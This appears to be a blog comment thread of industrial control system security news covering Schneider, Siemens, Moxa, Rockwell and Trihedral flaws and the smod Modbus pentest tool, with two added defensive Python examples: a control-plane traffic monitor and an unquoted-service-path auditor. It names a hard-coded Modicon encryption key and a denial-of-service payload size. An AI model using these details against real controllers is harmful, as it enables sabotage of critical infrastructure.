    The vulnerability in the simulator component of Unity Pro enables attackers to natively access industrial controllers and use a manipulated .apx file to execute malicious code. Since the delivery of the .apx file is an engineering control-plane activity, executed over a proprietary protocol, it is difficult to identify and detect.

    The use of proprietary protocols for control-plane activities is a common yet misunderstood practice in ICS networks. Unlike IT networks where data-plane and control-plane activities are executed over the same communication protocols, in ICS networks different protocols are used for these activities.

    Widely known protocols like MODBUS, PROFINET and DNP3, are all data-plane protocols. However, this is not where dangerous manipulations to ICS/SCADA networks and industrial controllers take place. The control-plane activities, which include all engineering and management activities performed on controllers (PLCs, RTUs) are executed over proprietary, vendor specific protocols which are unnamed, undocumented, and unmonitored.

    To identify such attacks and ensure the integrity of critical control devices, the proprietary control-plane protocols of ICS networks must be monitored.

  34. Tomi Engdahl says:

    Why Monitoring Control Plane Activity is a Requirement for Securing Industrial Networks

    Monitoring network activity is key to securing any production environment. Keeping tabs on the activities of the users, applications and the devices enables operators to ensure expected and normal operations. Monitoring also allows problems to be detected and corrected before damage can occur.

    However, not all networks are created equal. Monitoring industrial control system activity is difficult for two reasons. First, they use different protocols than IT networks. Second, separate protocols are used for performing data-plane and control-plane activities:

    Data-Plane: sometimes referred to as the user plane, carries the user-data traffic. The data-plane is used by the HMI and SCADA applications to communicate process parameters and physical measurements between the human operator and the industrial equipment (I/Os).

    Control Plane: carries the control information. In industrial networks the control-plane activities include all the engineering activity related to the maintenance lifecycle of industrial controllers, such as any read/change of: controller firmware, control-logic, configuration settings, or state. It also includes the administration and operations traffic. [Note that the term ‘control-plane’ is a general networking term, and isn’t related to the control layer of the Purdue Model or controllers in ICS networks]

    The protocols used for data-plane activities are those used by HMI/SCADA applications to communicate with control-devices. These protocols, which include MODBUS, PROFINET, DNP3 and more, are well known and fully documented.

    However, many are unaware of the fact that in ICS networks the control-plane activities use different protocols – a separation that does not exist in IT networks!

    Unlike the data-plane protocols, control-plane protocols are vendor specific proprietary protocols that are mostly unknown, undocumented and often unnamed. This is because they were designed to be used only by the vendor’s engineering software tools. But over the years, other tools that utilize these protocols have been developed and can be used for control-plane activities and changing critical industrial controllers.
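
    A minimal flow-level monitor illustrating the distinction drawn in comments 33 and 34, as an added example that is neither Indegy’s nor the article’s code: documented data-plane protocols (MODBUS/TCP on port 502, DNP3 on port 20000) are recognised by port, and anything else sent to a controller is treated as control-plane activity that must originate from an allowlisted engineering workstation. The addresses, the vendor port 5000 and the flow-record format are constructed assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional

# Documented data-plane protocols used by HMI/SCADA applications (well-known ports).
DATA_PLANE_PORTS = {
    502: "MODBUS/TCP",
    20000: "DNP3",
}

# Assumptions for this example: which hosts are controllers, and which hosts are
# the engineering workstations allowed to perform control-plane activity.
CONTROLLERS = {"10.10.1.11", "10.10.1.12"}
ENGINEERING_WORKSTATIONS = {"10.10.0.5"}

@dataclass
class Flow:
    ts: str
    src: str
    dst: str
    dport: int
    proto: str

@dataclass
class Finding:
    ts: str
    src: str
    dst: str
    plane: str      # "data" or "control"
    protocol: str   # protocol name, or "unknown/vendor" for control-plane traffic
    severity: str   # "info", "medium" or "high"
    reason: str

def parse_flow(line: str) -> Optional[Flow]:
    """Parse one constructed flow record: '<ts> <src> -> <dst>:<dport>/<proto>'."""
    parts = line.split()
    if len(parts) != 4 or parts[2] != "->":
        return None
    try:
        dst, port_proto = parts[3].split(":")
        dport, proto = port_proto.split("/")
        return Flow(parts[0], parts[1], dst, int(dport), proto.lower())
    except ValueError:
        return None

def classify(flow: Flow) -> Optional[Finding]:
    """Classify traffic towards a controller. Anything that is not a documented
    data-plane protocol is treated as control-plane (vendor engineering) traffic."""
    if flow.dst not in CONTROLLERS:
        return None  # not controller traffic; out of scope for this monitor
    if flow.dport in DATA_PLANE_PORTS:
        return Finding(flow.ts, flow.src, flow.dst, "data", DATA_PLANE_PORTS[flow.dport],
                       "info", "documented data-plane protocol")
    if flow.src in ENGINEERING_WORKSTATIONS:
        # Authorized, but control-plane activity can change logic or firmware: always record it.
        return Finding(flow.ts, flow.src, flow.dst, "control", "unknown/vendor",
                       "medium", "control-plane activity from authorized engineering workstation")
    return Finding(flow.ts, flow.src, flow.dst, "control", "unknown/vendor",
                   "high", "control-plane activity from unauthorized host")

def monitor(lines: List[str]) -> List[Finding]:
    """Run the classifier over flow records, skipping unparseable lines."""
    findings = []
    for line in lines:
        flow = parse_flow(line)
        if flow is not None:
            finding = classify(flow)
            if finding is not None:
                findings.append(finding)
    return findings

# Constructed sample flow records (not real captures).
SAMPLE_FLOWS = [
    "2017-03-01T08:00:01 10.10.0.20 -> 10.10.1.11:502/tcp",    # HMI polling a PLC over Modbus
    "2017-03-01T08:00:02 10.10.0.20 -> 10.10.1.12:20000/tcp",  # HMI polling an RTU over DNP3
    "2017-03-01T08:05:10 10.10.0.5 -> 10.10.1.11:5000/tcp",    # engineering workstation, assumed vendor port
    "2017-03-01T08:07:44 10.10.0.77 -> 10.10.1.11:5000/tcp",   # contractor laptop, same vendor port
    "2017-03-01T08:08:00 10.10.0.77 -> 10.10.0.20:445/tcp",    # not a controller: ignored
    "malformed record",
]

if __name__ == "__main__":
    for f in monitor(SAMPLE_FLOWS):
        print(f"{f.ts} {f.severity:6} {f.plane:7} {f.src} -> {f.dst} ({f.protocol}): {f.reason}")
```

    In a real deployment the controller and workstation sets would come from an asset inventory, and the "medium" findings would be reconciled against change tickets or maintenance windows.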

  35. Tomi Engdahl says:

    Security Firm Discloses Unpatched Flaws in Schneider HMI Product

    A cybersecurity startup has disclosed a couple of unpatched denial-of-service (DoS) vulnerabilities affecting a human-machine interface (HMI) product from Schneider Electric.

    CRITIFENCE, a company that specializes in security solutions for industrial control systems (ICS), reported on Tuesday that Eran Goldstein, its CTO and founder, in April discovered two serious flaws in Schneider Electric Magelis HMI panels.

  36. Tomi Engdahl says:

    Flaws Found in Moxa Industrial Ethernet Products

    A researcher has discovered a couple of critical and medium severity vulnerabilities affecting various industrial ethernet products from Taiwan-based industrial networking, computing and automation solutions provider Moxa.

    According to an advisory published recently by ICS-CERT, Moxa’s OnCell industrial LTE cellular gateways, AWK wireless AP/bridge/client products, WAC wireless access controllers, and TAP railway wireless units have improper authentication and OS command execution vulnerabilities. The issues were reported to Moxa, through ICS-CERT, by researcher Maxim Rupp.

    The more serious of the issues, tracked as CVE-2016-8363 and assigned a CVSS score of 9.1, allows a malicious user to execute arbitrary OS commands on the affected server.

    The second flaw, identified as CVE-2016-8362, allows a user to download log files by accessing specific URLs.

    Firmware updates that patch these vulnerabilities were released by Moxa on November 1 for OnCell G3470A-LTE and AWK-1131A/3131A/4131A products. Firmware updates for some of the other devices are expected to become available in May and June 2017.

  37. Tomi Engdahl says:

    Privilege Escalation Flaw Affects Several Siemens Products

    Siemens has released updates and temporary fixes to address a medium-severity privilege escalation vulnerability affecting many of its industrial products.

    Organizations have been warned that users with local access to the Windows operating system running on the same device as affected Siemens applications can escalate their privileges if certain conditions are met.

    “Unquoted service paths could allow local Microsoft Windows operating system users to escalate their privileges if the affected products are not installed under their default path (“C:\Program Files\*” or the localized equivalent),” Siemens and ICS-CERT wrote in advisories published this week.

    The vulnerability, tracked as CVE-2016-7165, cannot be exploited if the impacted product is installed in the default path or the localized equivalent.

    The security hole affects several Siemens SCADA systems, distributed control systems (DCS), engineering tools, and simulators, including SIMATIC, SINEMA, TeleControl, SOFTNET, SIMIT, Security Configuration Tool (SCT) and Primary Setup Tool (PST) products.

    Advisory (ICSA-16-313-02)
    Siemens Industrial Products Local Privilege Escalation Vulnerability

    High severity flaws in Phoenix Contact inline controllers

    ICS-CERT also published an advisory this week to warn users about high severity flaws affecting inline controllers manufactured by Phoenix Contact, a Germany-based automation company.

    Advisory (ICSA-16-313-01)
    Phoenix Contact ILC PLC Authentication Vulnerabilities
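
    An audit helper for the unquoted service path weakness described in comment 37, added here as an example and not Siemens’ or ICS-CERT’s code: given a service’s configured binary path, it reports whether the path is unquoted with spaces and lists the shorter paths Windows would try first, which is where file-system permissions need checking. The service names and directories are constructed placeholders; the quoted “C:\Program Files” entry mirrors the default install location the advisory mentions.

```python
import re
from typing import List

# Constructed examples of service binary paths (BINARY_PATH_NAME as shown by `sc qc`);
# vendor and directory names are placeholders, not real products.
SAMPLE_SERVICE_PATHS = {
    "VendorSvcQuoted": r'"C:\Program Files\Vendor Tool\service.exe" -run',
    "VendorSvcUnquoted": r"C:\Custom Install\Vendor Tool\service.exe -run",
    "WindowsSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "NoExtension": r"D:\Ctrl Apps\agent",
}

EXE_PATTERN = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)

def executable_part(image_path: str) -> str:
    """Return the portion of an unquoted ImagePath up to and including the first
    '.exe' token; anything after it is treated as command-line arguments."""
    m = EXE_PATTERN.search(image_path)
    return image_path[: m.end()] if m else image_path.strip()

def is_quoted(image_path: str) -> bool:
    return image_path.lstrip().startswith('"')

def candidate_paths(image_path: str) -> List[str]:
    """Paths Windows tries, in order, when starting an unquoted path containing
    spaces: each prefix ending at a space is tried as '<prefix>.exe' before the
    full path. Every earlier candidate must be unwritable by standard users."""
    if is_quoted(image_path):
        return [image_path.strip().split('"')[1]]
    exe = executable_part(image_path)
    candidates = []
    for i, ch in enumerate(exe):
        if ch == " ":
            candidates.append(exe[:i] + ".exe")
    if not exe.lower().endswith(".exe"):
        exe += ".exe"
    candidates.append(exe)
    return candidates

def is_unquoted_path_vulnerable(image_path: str) -> bool:
    """True when the path is unquoted and contains at least one space before the
    executable, i.e. Windows would try a shorter path first."""
    return not is_quoted(image_path) and len(candidate_paths(image_path)) > 1

def audit(services: dict) -> List[str]:
    """Return the names of services whose configured path is vulnerable."""
    return [name for name, path in services.items() if is_unquoted_path_vulnerable(path)]

if __name__ == "__main__":
    for name in audit(SAMPLE_SERVICE_PATHS):
        print(f"{name}: unquoted path with spaces")
        for p in candidate_paths(SAMPLE_SERVICE_PATHS[name]):
            print("   tries:", p)
```

    The default “C:\Program Files” location is not exploitable because standard users cannot create files there; the same check applied to a custom install directory shows which intermediate paths need the same protection.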

  38. Tomi Engdahl says:

    Experts Propose Cybersecurity Strategy for Nuclear Facilities

    Institutionalizing cybersecurity, reducing complexity, active defenses and transformative research should be a priority in reducing the risk of damaging cyberattacks at nuclear facilities, according to the Nuclear Threat Initiative (NTI).

    While the Stuxnet attacks aimed at Iran are the most well-known, nuclear facilities in Germany and South Korea have also been hit by cyberattacks. European Union officials have also raised concerns about the possibility of attacks against Belgium’s nuclear plants.

    Reports published in the past months warned that countries are not prepared to handle attacks targeting their nuclear facilities, and the nuclear industry still underestimates cyber security risk.

    A report published on Wednesday by the NTI provides a set of recommendations for improving cyber security at nuclear facilities based on a 12-month analysis conducted by an international group of technical and operational experts.

    One of the most important priorities involves institutionalizing cybersecurity. Specifically, nuclear facilities should learn from their safety and physical security programs and integrate these practices into their cybersecurity programs.

    Another priority should be active defenses. Experts pointed out that a determined adversary will likely be capable of breaching the systems of a nuclear facility and organizations must be prepared to efficiently respond to such incidents.

    Reducing the complexity of digital systems should also be a priority for nuclear facilities. Experts recommend minimizing the complexity of digital systems and even replacing them with non-digital or secure-by-design products.

    Finally, the NTI recommends conducting transformative research with the goal of developing hard-to-hack systems for critical applications.

    “Today’s defenses are no longer adequate, and a fresh look at how to best protect nuclear facilities from cyberattack is needed,” experts wrote in the NTI report. “The threat is too great, and the potential consequences are too high, to remain comfortable with the status quo.”

  39. Tomi Engdahl says:

    IBM Reports Significant Increase in ICS Attacks

    The number of attacks aimed at industrial control systems (ICS) increased by 110 percent in 2016 compared to the previous year, according to data from IBM Managed Security Services.

    The company has attributed this significant increase to brute force attacks on supervisory control and data acquisition (SCADA) systems.

    Attackers apparently used a penetration testing framework made available on GitHub in January 2016. The tool, named smod, can be used to conduct a security assessment of the Modbus serial communications protocol and it includes brute-force capabilities.

    “The public release and subsequent use of this tool by various unknown actors likely led to the rise in malicious activity against ICS in the past 12 months,”

    MODBUS Penetration Testing Framework

    smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software could be run on Linux/OSX under python 2.7.x.

  40. Tomi Engdahl says:

    Schneider Electric Patches Flaws in ClearSCADA, Wonderware Products

    Schneider Electric has released patches to address critical and high severity vulnerabilities in its StruxureWare SCADA Expert ClearSCADA and Wonderware Intelligence products, ICS-CERT informed organizations last week.

    According to advisories released by both ICS-CERT and Schneider Electric, the ClearSCADA product is affected by a high severity flaw (CVE-2017-6021) that allows an attacker on the network to crash the ClearSCADA server process and communications driver by sending a specially crafted request.

    The security hole, discovered by researchers at Kaspersky Lab, affects all supported versions of the SCADA product, including ClearSCADA 2014 R1 (build 75.5210), 2014 R1.1 (build 75.5387), 2015 R1 (build 76.5648) and 2015 R2 (build 77.5882).

  41. Tomi Engdahl says:

    Malware ‘disguised as Siemens firmware drills into 10 industrial plants’
    Four years of active infection, claims security biz Dragos

    Malware posing as legitimate firmware for Siemens control gear has apparently infected industrial equipment worldwide over the past four years.

    The cyber-nasty is packaged as software to be installed on Siemens programmable logic controllers (PLC), we’re told. At least 10 industrial plants – seven in the US – were found running the infected firmware, a study by industrial cybersecurity firm Dragos claims.

    Project MIMICS – Stage One

  42. Tomi Engdahl says:

    High Severity Flaws Patched in Rockwell Automation Tools

    High severity vulnerabilities have been patched by Rockwell Automation in the company’s Connected Components Workbench and FactoryTalk Activation tools, ICS-CERT said on Wednesday.

    One of the flaws, discovered by researcher Ivan Sanchez and tracked as CVE-2017-5176, affects Connected Components Workbench (CCW), a design and configuration application for Rockwell devices. The product is used worldwide in various industries.

  43. Tomi Engdahl says:

    Schneider Electric still shipping passwords in firmware
    You’d think a vendor of critical infrastructure would at least pretend to care about security

    That “don’t use hard-coded passwords” infosec rule? Someone needs to use a needle to write it on the corner of Schneider Electric’s developers’ eyes so they don’t forget it.

    Yes, it’s happened again, this time on the SCADA vendor’s Schneider Modicon TM221CE16R, Firmware – and without new firmware, users are stuck, because they can’t change the password.

    It’s a real Friday-afternoon-special: someone encrypted the user/password XML file with the fixed key “SoMachineBasicSoMachineBasicSoMa”.

    That means an attacker can open the control environment (SoMachine Basic 1.4 SP1), get and decrypt the user file, and take over.

  44. Tomi Engdahl says:

    World Close to ‘Serious Digital Sabotage’: Dutch Spy Chief

    The world may be close to a “serious act of digital sabotage” which could trigger unrest, “chaos and disorder,” Dutch spy chief Rob Bertholee warned Tuesday.

    Sabotage of critical infrastructure “is the kind of thing that might keep you awake at night,” Bertholee told a timely cyber security conference in The Hague, as global experts grapple with the fallout of a massive cyberattack over the past days.

    Digital threats “are not imaginary, they are everywhere around us,” the head of the country’s intelligence services (AIVD) told the conference organised by the Dutch government.

    “In my opinion, we might be closer to a serious act of digital sabotage than a lot of people can imagine,” he told hundreds of experts and officials.

    The world’s infrastructure was heavily interconnected, which had huge benefits, but also “vulnerabilities”.

    “Imagine what would happen if the entire banking system were sabotaged for a day, two days, for a week,” he asked.

    “Or if there was a breakdown in our transportation network. Or if air traffic controllers faced cyberattacks while directing flights. The consequences could be catastrophic.”

    Added Bertholee: “Sabotage on one of these sectors could have major public repercussions, causing unrest, chaos and disorder.”

    The threat of “cyber terrorism” from terror groups such as the so-called Islamic State jihadist and Al-Qaeda was still limited, he said, but “jihadist-inspired terrorism is the number one priority” of the Dutch intelligence services.

    “The level of technical expertise available to a jihadist group is still insufficient to inflict significant damage or personal injury through digital sabotage,” Bertholee said.

    “They may not yet have the capability but they definitely have the intent,” he warned.

  45. Tomi Engdahl says:

    ICS Environments: Insecure by Design

    Industrial Control System Design Flaws Have a Profound Impact on Security Posture of Operational Networks

    It’s a generally known fact that most Industrial Control System (ICS) environments were not built with cyber security in mind because they were designed before the cyber threat existed. For decades these networks were protected by an air-gap, disconnected from the outside world. With the introduction of commercial off the shelf (COTS) technology in the 1990s (which replaced proprietary, purpose-built industrial hardware and software) and the increasing connectivity to corporate networks and the Internet, these systems have become more exposed to cyber threats and the risk of compromise.

    The impact of vulnerabilities and design flaws

    Like IT networks, ICS environments are susceptible to software and hardware vulnerabilities. In recent years there has been a significant increase in the number of ICS vulnerabilities reported.

    ICS networks have become easy targets because they lack basic security controls such as authentication, and do not support encrypted communication. In IT security terms, this represents a major design flaw that adversely impacts the overall security of the ICS environment. This means that anyone with network access can make changes to controller logic and configuration which can severely affect operations and have a catastrophic impact on plant safety and reliability.

    Visibility and control in ICS networks

    ICS networks suffer from a lack of visibility which prevents engineering and security staff from identifying a malicious actor compromising critical assets, or a contractor that may be making an unauthorized change to the configuration of a controller. Not knowing with certainty what’s happening in these networks severely impacts the staff’s ability to detect and respond to incidents, whether caused by cyber threats or human error.

    As long as security controls aren’t available to prevent unauthorized/malicious changes, the design flaws of ICS will continue to affect their security posture and put them at a high risk of compromise. No amount of vulnerability remediation can prevent access to the controllers on ICS networks or mitigate the risk of compromise resulting from a lack of security controls.

  46. Tomi Engdahl says:

    High Severity Flaws Patched in Trihedral SCADA Software

    An update released by Trihedral for its VTScada product patches several vulnerabilities, including high severity weaknesses that can be exploited even by less skilled hackers.

    VTScada, Trihedral’s flagship product, is a software suite designed for creating human-machine interfaces (HMI) for supervisory control and data acquisition (SCADA) systems. The product is used in various industries, mainly in North America and Europe.

    Security researcher Karn Ganeshen discovered several vulnerabilities affecting VTScada versions prior to 11.2.26. The expert told SecurityWeek that a Shodan search showed a few systems running VTScada accessible from the Internet, but he believes there are more vulnerable instances that are exposed to attacks.

    In an advisory published on his website, Ganeshen said an attacker with a non-privileged account can cause excessive CPU and RAM usage by submitting a large payload (up to roughly 80,000 characters) in the username field of the login window.

  47. Tomi Engdahl says:

    [ICS] Trihedral VTScada Multiple Vulnerabilities

    ICS-CERT published an advisory on one of my reports this week –

  48. Tomi Engdahl says:

    Intel AMT bug bit Siemens industrial PCs
    Patches issued for 38 products, plus bonus Web portal bug-fix

    You don’t need state-sponsored hackers to crack industrial control systems, just an empty Intel AMT login – something Siemens started patching against last week.

    The bug in Intel’s Active Management Technology emerged in June. It allowed a user to exploit AMT features with an empty login string, and has been shipping in processors since 2010.

    In Siemens’s case, 38 product series use vulnerable Intel chipsets (the company lists them in this PDF). They include SIMATIC industrial PCs, SINUMERIK control panels and SIMOTION P320 PCs.

    The company has shipped patches for the SIMATIC PCs, but is still working on the control panel products.

  49. Tomi Engdahl says:

    Flaw in Siemens RTU Allows Remote Code Execution

    Potentially serious vulnerabilities have been found in some Siemens SICAM remote terminal unit (RTU) modules, but patches will not be released as the product has been discontinued.

    Researchers at IT security services and consulting company SEC Consult discovered the flaws in the SICAM RTU SM-2556 COM modules, which can be attached to SICAM 1703 and RTU substation controllers for LAN/WAN communications. The product is used worldwide in the energy and other sectors.

    The most serious of the security holes is CVE-2017-12739, a critical vulnerability in the integrated web server that allows an unauthenticated attacker with network access to remotely execute code on affected devices.

    The vulnerabilities affect devices running firmware versions ENOS00, ERAC00, ETA2, ETLS00, MODi00 and DNPi00. Since the product has been discontinued, Siemens has decided not to release patches. However, users can prevent potential attacks by disabling the affected web server, which is designed for diagnostics and is not needed for normal operation.

    In its own advisory, SEC Consult said it reported the vulnerabilities to Siemens in late September. According to the company, the GoAhead webserver used by the RTU module was released in October 2003 and it’s affected by several known vulnerabilities.

